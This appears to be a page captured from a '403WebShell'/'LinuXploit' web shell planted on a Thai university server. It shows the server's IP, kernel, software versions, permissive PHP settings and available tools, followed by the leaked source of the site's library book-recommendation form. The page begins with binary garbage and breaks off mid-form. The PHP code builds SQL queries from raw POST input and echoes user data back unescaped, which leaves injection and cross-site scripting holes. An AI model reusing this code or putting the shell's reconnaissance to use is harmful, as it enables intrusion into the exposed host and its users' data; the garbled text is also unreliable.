403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell
Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/html/arit/
Upload File :
[ Back ]
Current File : /var/www/html/arit/IntroForm_Admin.php
<? session_start();	 	
include "IntroForm_Check.php";?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">

<link rel="shortcut icon" href="images/logotab.ico">
</head>

 <!-- เลือกวันที่-->
<link type="text/css" href="calendar2/flora.calendars.picker.css" rel="stylesheet"/>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.plus.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai-th.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker-th.js"></script>
<script type="text/javascript">
$(function() {
    $('#mydate').calendarsPicker({calendar: $.calendars.instance('thai','th')});
});
</script>
        <link href="structer.css" rel="stylesheet" type="text/css">



 <!-- คณะและสาขาวิชา่-->
<script language="javascript">
menu = new Array();
menu[-1] = new Array(0, "ไม่มีข้อมูล");
menu[1] = new Array( 101, "การศึกษาปฐมวัย", 102, "สังคมศาตร์", 103, "ภาษาไทย",104,"ภาษาอังกฤษ",105,"คณิตศาสตร์",106,"วิทยาศาสตร์ทั่วไป");
menu[2] = new Array(201, "พัฒนาชุมชน", 202, "ภาษาอังกฤษ",203,"รัฐประศาสนศาสตร์",204,"ภาษาไทย",205,"การจัดการทางวัฒนธรรม",206,"สังคมศาสตร์เพื่อมัคคุเทศก์");
menu[3] = new Array(301, "อุตสาหกรรมท่องเที่ยว", 302, "บริหารทรัพยากรมนุษย์",303,"การจัดการ",304,"การตลาด",305,"คอมพิวเตอร์ธุรกิจ",306,"เศรษฐศาสตร์ ",307,"นิเทศศาสตร์ ");
menu[4] = new Array(401, "การเพาะเลี้ยงสัตว์น้ำ", 402, "เกษตรศาสตร์",403,"วิทยาศาสตร์และเทคโนโลยีการอาหาร");//ถ้าเพิ่ม สาขาก็เพิ่มmenu[4]
menu[5] = new Array(501, "วิศวกรรมการจัดการ", 502, "เทคโนโลยีอุตสาหกรรม (ต่อเนื่อง)");
menu[6] = new Array(601, "การแพทย์แผนไทยประยุกต์", 602, "สาธารณสุขศาสตร์",603,"ฟิสิกส์",604,"เคมี",605,"ชีววิทยา",606,"เทคโนโลยียางและพอลิเมอร์",607,"เทคโนโลยีสารสนเทศ",608,"วิทยาการคอมพิวเตอร์",609,"วิทยาศาสตร์สิ่งแวดล้อม",610,"คหกรรมศาสตร์",611,"ชีววิทยาประยุกต์",612,"คณิตศาสตร์และสถิติ");
menu[7] = new Array(701, "ออกแบบประยุกต์ศิลป์", 702, "นาฏยรังสรรค์",703,"ดนตรีสากล",704,"ดนตรีไทย",705,"ทัศนศิลป์");
menu[8] = new Array(801, "หลักสูตรและการสอน", 802, "การบริหารการศึกษา",803,"ยุทธศาสตร์การพัฒนา",804,"วิทยาศาสตร์ศึกษา",805,"สาธารณสุขชุมชน",806,"การจัดการเทคโนโลยีการเกษตร",807,"การบริหารธุรกิจ");


function showSubMenu(i)//อันนี้ไม่ต้องแก้
{
box = document.f1.Branch;
i++;
while(box.options.length) box.options[0] = null;
c = 0;
for(m = 0; m < menu[i-1].length/2; m++) {
if((document.f1.action.value == "post") && (menu[i-1][m*2] >= 0)) {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
else {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
}
}
</script>		
		

<script language="JavaScript"> // ตรวจสอบข้อมูลก่อนเพิ่ม
function checkFields2() {
missinginfo = "";
if (document.f1.Title.value == "") { 
missinginfo += "\n - * ชื่อเรื่อง";
}
if (document.f1.Fname.value == "") { 
missinginfo += "\n - * ชื่อ";
}
if (document.f1.Lname.value == "") { 
missinginfo += "\n - * สกุล";
}

if (missinginfo != "") {
missinginfo ="_____________________________\n" +
"กรุณากรอกข้อมูลต่อไปนี้ :\n" +
missinginfo + "\n_____________________________" +
"\nกรุณากลับไปกรอกอีกครั้ง ";
alert(missinginfo);
return false;
}
else return true;
}
</script>

<title>แบบฟอร์มแนะนำทรัพยากรเข้าห้องสมุด</title>

</head>
<style type="text/css">
.news_content
{
	width:750px;
	float:right;
}

.news_menu
{
	width:200px;
	float:left;
	height:800px;
}

.sidebar_menu {
	list-style: none;
	margin: 0 0 30px;
	padding: 0;
}
.sidebar_menu li {
	margin: 0;
	padding: 2px 0 3px 16px;
	background: url(./images/templatemo_list_01.png) no-repeat scroll 0 8px;
	border-bottom: 1px dotted #ccc
}

.sidebar_menu li a {
	font-size: 14px;
}

#sidebar h3 {
	font-size: 16px;
	padding: 0 0 15px 0;
	margin: 0 0 15px 0;
	background: url(./images/sidebar_header_bg.png)  left bottom no-repeat
}


h1 {
	margin: 0 0 5px 0;
	padding: 10px 0 10px 10px;
	font-size: 24px;
	font-weight: normal;
	color: #ffffff;
	background: #26405b;
}

h2 {
	margin: 0 0 10px 0;
	padding: 5px 0 5px 10px;
	font-size: 16px;
}


h4 {
	margin: 0;
	padding: 3px 0 3px 10px;
	font-size: 18px;
	font-weight: bold;
	color: #03F;
	background: #EEE;
}


 .section_02_box {
	 
	float: left;
	width: 350px;
	border: 1px solid #CCCCCC;
	margin: 0 20px 0 0px;
}

.section_02_box .section_02_box_content{
	float: left;
	padding: 15px;
}

.section_02_box_content .section_02_box_content_title {
	font-weight: bold;
}

.section_02_box_content ul{
	clear: both;
	list-style: none;
	margin: 0;
	padding: 0;
}

.section_02_box_content ul li{
	padding: 0 0 5px 15px;
	margin: 0;	
	background: url(images/templatemo_listicon.gif) top left no-repeat;
}

.section_02_box img {
	float: left;
	margin: 3px 15px 0 0;
}
.cleaner_with_height {
	clear: both;
	width: 100%;
	height: 20px;
}

.style1 {color: #0000FF}
</style>



</head>


  <body>
	<!--start logo -->
	<div id="logo">
           		 <?  include "logo.php";?>
    </div>
    <!--end logo -->


  
	<!-- start nav -->
	<nav>
    	<div id="nav">
        	<div id="content-nav">
           		 <?  include "navigator.php";?>
            </div>
        </div>
       
    </nav>

    
    
	<!-- start article -->
    <article>
    
    	<div id="content"> 	<!-- start content -->
        
        	<div class="content-title">
			<?
			include "connect_intro_resource.php";

$query=mysql_query("select * from Booth  order by BoothID desc ");
$arr=mysql_fetch_array($query);
$BoothID =$arr[BoothID];
$BoothName =$arr[BoothName];
			?>
            แบบฟอร์มออกร้านหนังสือ  <img src="images/dot21.jpg" width="12px;"> 
              <div class="content-line"></div>
          </div>

			<div class="content-text">
                
                
	
                
                            	 <div class="news_menu">
            
        
                    <ul class="sidebar_menu">
                        <li><a href="IntroForm_Admin2.php">ค้นหาข้อมูล</a></li>				
        <?

									include('IntroForm_Authen.php');
									if(empty($numrows))
									{
		?>
                      			  <li><a href="IntroForm_login.php">เข้าระบบ</a></li>
                        
        <? 
									 
									}
									else
									{
										
										
										
		?>							
		
                       			 <li><a href="IntroForm_Admin.php">แบบฟอร์มออกร้านหนังสือ</a></li>				
						<li><a href="IntroForm_Publisher.php">ข้อมูลสำนักพิมพ์</a></li>				

									  <li><a href="IntroForm_logout.php">ออกจากระบบ</a></li>
        <?                              

									
									}
						
		?>
                        
                        
                        
                    </ul>
           
           		</div>	
                
                
                
                <div class="news_content">
				<? 

if(isset($_POST[Fname]))
{
$Fname=$_POST[Fname];
$Lname=$_POST[Lname];



include "connect_intro_resource.php";
		$query=mysql_query("select max(IntroID)  as maxid from introdetail ");
		$arr=mysql_fetch_array($query);
		$maxid=$arr[maxid];
		$maxid++;


$query=mysql_query("select * from user where Fname = '$Fname' and Lname='$Lname' ");
$row=mysql_num_rows($query);


		if (empty($row))
		{
				include "connect_intro_resource.php";

				$MailUser=$_POST[MailUser];
				$Tel=$_POST[Tel];
				$Depart=$_POST[Depart];
				
					mysql_query ("INSERT INTO  `intro_resource`.`user` (
				`Pre` ,
				`Fname` ,
				`Lname` ,
				`Depart` ,
				`MailUser` ,
				`Tel` 
				)
				VALUES (
				 '$pre', '$Fname' ,'$Lname','$Depart','$MailUser','$Tel'
				);
				")or die ("ไม่สามารถเพิ่มข้อมูลได้ค่ะ1");
						echo "เพิ่มข้อมูลเรียบร้อยแล้ว";
							
		}
		
		if (!empty($row)) 
		{
			if (!empty($Depart)) 
			{
			mysql_query("update user set Depart='$Depart' where Fname = '$Fname' and Lname='$Lname'");
			}
			if (!empty($MailUser)) 
			{
			mysql_query("update user set MailUser='$MailUser' where Fname = '$Fname' and Lname='$Lname' ");
			}
			if (!empty($Tel)) 
			{
			mysql_query("update user set Tel='$Tel' where Fname = '$Fname' and Lname='$Lname'");
			}
			if (!empty($pre)) 
			{
			mysql_query("update user set Pre='$pre' where Fname = '$Fname' and Lname='$Lname'");
			}
		
		}
					
			
			
		$query=mysql_query("select * from introdetail where Title = '$Title' and Author='$Author'  and Fname = '$Fname' and BoothID='$BoothID' ");
		$row=mysql_num_rows($query);
					
				if ($row == "")
					{
						$SourceType=$_POST[SourceType];
						$Publisher=$_POST[Publisher];
						$Title=$_POST[Title];
						$Author=$_POST[Author];
						$Edition=$_POST[Edition];
						$Year=$_POST[Year];
						$NumWant=$_POST[NumWant]; 
						$Price=$_POST[Price]; 
						$CallNumber=$_POST[CallNumber]; 
						$double=$_POST[double]; 
						$ISBN=$_POST[ISBN]; 
						$date=date("Y:m:d");
									
						mysql_query ("INSERT INTO  `intro_resource`.`introdetail` (
									`IntroID` ,
									`UserID` ,
									`Fname` ,
									`Lname` ,
									`SourceType` ,
									`Title` ,
									`Author` ,
									`Publisher` ,
									`PulbilshYear` ,
									`Edition` ,
									`Note` ,
									`Price` ,
									`NumWant` ,
									`SourceStatus` ,
									`OrderType` ,
									`CallNumber` ,
									`IntroDate`,
									`BoothID`,
									`double`,
									`ISBN`
									)
									VALUES (
									'$maxid' ,  '1',  '$Fname',  '$Lname',  '$SourceType',  '$Title',  '$Author',  '$Publisher',  
									'$Year',  '$Edition',  '',  '$Price',  '$NumWant',  '1' ,   '3',  '$CallNumber',  '$date','$BoothID','$double','$ISBN'
									);
									")or die ("ไม่สามารถเพิ่มข้อมูลได้ค่ะ");
											echo "เพิ่มข้อมูลเรียบร้อยแล้ว  ";
					
											
							}
		
							else 
							{"ขออภัยค่ะ ไม่สามารถเพิ่มข้อมูลได้...เนื่องจากทรัพยากรซ้ำ";}
$query=mysql_query("select * from user where  Fname = '$Fname' and Lname='$Lname' ");
$arr=mysql_fetch_array($query);
$Pre =$arr[Pre];
$Depart =$arr[Depart];
$MailUser =$arr[MailUser];
$Tel =$arr[Tel];
$Pre =$arr[Pre];
		
}
			?>
			


  <form action="IntroForm_Admin.php" method="post" name="f1" onSubmit="return checkFields2();">
    <? 
if(isset($_POST[Fname]))

{
echo "    <h2> แนะนำทรัพยากรเพิ่มเติม </h2> ";
echo " <p style='margin-left:20px;'>	";
echo "<span class='style1'>ชื่อ-สกุล : </span> $Pre $Fname $Lname   ";
if (!empty($Depart))
{ echo "<span class='style1'>สังกัด :  </span>$Depart  ";}
if (!empty($MailUser))
{ echo "<span class='style1'>อีเมล :  </span>$MailUser  ";}
if (!empty($Tel))
{ echo "<span class='style1'>เบอร์โทร :  </span>$Tel  ";}
echo "<input name='Fname' id='Fname' type='hidden' value='$Fname'>";
echo "<input name='Lname' id='Lname' type='hidden' value='$Lname'>";
echo "<input name='Depart' id='Depart' type='hidden' value='$Depart'>";
echo "</p>";

}

else
{

?>

  <h2> ข้อมูลผู้แนะนำทรัพยากร <? echo "$BoothName  "; ?></h2> 
  
		  <p style="margin-left:20px;">	<span class="style1">คำนำหน้า
		  <select name="pre" id="pre">
		  <option value="">--กรุณาเลือก--</option>
		    <option value="นางสาว">นางสาว</option>
		    <option value="นาง">นาง</option>
		    <option value="นาย">นาย</option>
		    <option value="อาจารย์">อาจารย์</option>
		    <option value="ศ.ดร.">ศ.ดร.</option>
		    <option value="รศ.ดร.">รศ.ดร.</option>
		    <option value="ผศ.ดร.">ผศ.ดร.</option>
	      </select>
		  **ชื่อ</span>            
		    <input name="Fname" type="text" id="Fname" value="<? echo "$Fname"; ?>" size="30"/>
		    <span class="style1">            **สกุล</span>            
		    <input name="Lname" type="text" id="Lname" value="<? echo "$Lname"; ?>" size="30"/>
</p>

		  <p style="margin-left:20px;">	
		  <span class="style1">สังกัด</span>
		  <input name="Depart" type="text" id="Depart" value="<? echo "$Depart"; ?>" size="38"/>		    
		  <span class="style1">            อีเมล</span>            
		    <input name="MailUser" id="MailUser" type="text" value="<? echo "$MailUser"; ?>"/>
		    <span class="style1">            เบอร์โทร           
		    <input name="Tel" type="text" id="Tel" value="<? echo "$Tel"; ?>" size="18"/> 
		    </span> 
</p>



<?
}
?>

  <h2> ข้อมูลทรัพยากร </h2> 
  
		  <p style="margin-left:20px;"> <span class="style1">	ประเภททรัพยากร</span>  
		  <select name="SourceType" id="SourceType">

		  <option value='1'>หนังสือ</option>
		    <option value='2'>CD</option>
		    <option value='3'>DVD</option>
		    <option value='4'>VDO</option>
		    <option value='5'>เทป</option>
		    <option value='6'>ฐานข้อมูล</option>
		    <option value='7'>อื่น ๆ</option>
		    </select>
		  <span class="style1">**ชื่อเรื่อง</span>            
		    <input name="Title" id="Title" type="text" size="70px;"/>
		   
	    <p style="margin-left:20px;">	
		    <span class="style1">      ชื่อผู้แต่ง</span>            
		    <input name="Author" id="Author" type="text" size="43px;" />
		     <span class="style1">สำนักพิมพ์</span>          
		    <input name="Publisher" id="Publisher" type="text" size=45px;&quot; /> 
	    </p>
			
			<p style="margin-left:20px;">	 
		    <span class="style1">
			ISBN            
		    <input name="ISBN" id="ISBN" type="text"size="20px;" />		
			เลขเรียก            
		    <input name="CallNumber" id="CallNumber" type="text"size="25px;"   />	</span> </p>  
			<p style="margin-left:20px;">	 
		    <span class="style1">
		    ปีที่พิมพ์</span>            
		    <input name="Year" id="Year"
Youez - 2016 - github.com/yon3zu
LinuXploit